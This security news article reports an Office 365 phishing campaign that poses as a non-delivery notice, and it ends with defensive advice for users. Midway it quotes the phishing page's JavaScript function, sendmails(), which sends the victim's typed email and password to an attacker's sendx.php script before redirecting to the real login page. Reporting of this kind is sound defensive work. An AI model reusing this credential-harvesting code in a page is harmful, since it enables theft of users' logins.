Hacker News
New Phishing Attack Targets Office 365 Users

Phishing scams are continuing to plague the emails of people around the world, and this week a new one was discovered. The new phishing campaign pretends to be a non-delivery notification from Office 365, that encourages users to enter their login information into a page with the aim of stealing username and password data.
ISC Handler Xavier Mertens discovered the phishing scam and released its details on Thursday 13 December. The email, masquerading as Microsoft states “Microsoft found Several Undelivered Messages”, telling the user that their message couldn’t be delivered. It then includes a “How to Fix it” section which states:
“if you’re using Outlook, open this non-delivery report message and click Send Again.”
When the victim clicks on the “Send Again” link located in the phishing email, they will be routed to a phishing site that masquerades as the Office 365 login screen. The site also has a feature that auto-populate the email address field, using the victim’s email address, which adds to the legitimacy of the site. The user is encouraged to enter their password to resend the emails. When a user does enter their password, a JavaScript function called sendmails() will send the login details to the sendx.php script
function sendmails() { var em = $('#testx').val(); var ps = $('#pass').val(); var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { var response = JSON.parse(this.responseText); if (response.msg == "donesend") { $(".login_form").hide(); $(".thanks").show(); setTimeout("window.location.href='https://outlook.office365.com/owa/?realm';",5000); } else { $("#warning").empty(); $('#warning').append('Your email or password is incorrect. If you don\'t remember your password,<a href="#"> reset it now.<a/>'); } } }; xhttp.open("GET", "sendx.php?user=" + em + "&pass=" +ps, true); xhttp.send(); }
and then redirect the user to the legitimate Office 365 login screen.
The website the attackers link to in their email, makings a convincing attempt to mirror the legitimate Office 365 website. Phishing campaigns like these are becoming increasingly sophisticated and it is becoming increasingly difficult for the average computer user to tell the difference, leading many people to fall victim to sharing their credentials. We encourage users to check the URL and not proceed if anything looks suspicious. Going further, it would be preferential for users to go directly to the correct URL without following the link provided in emails.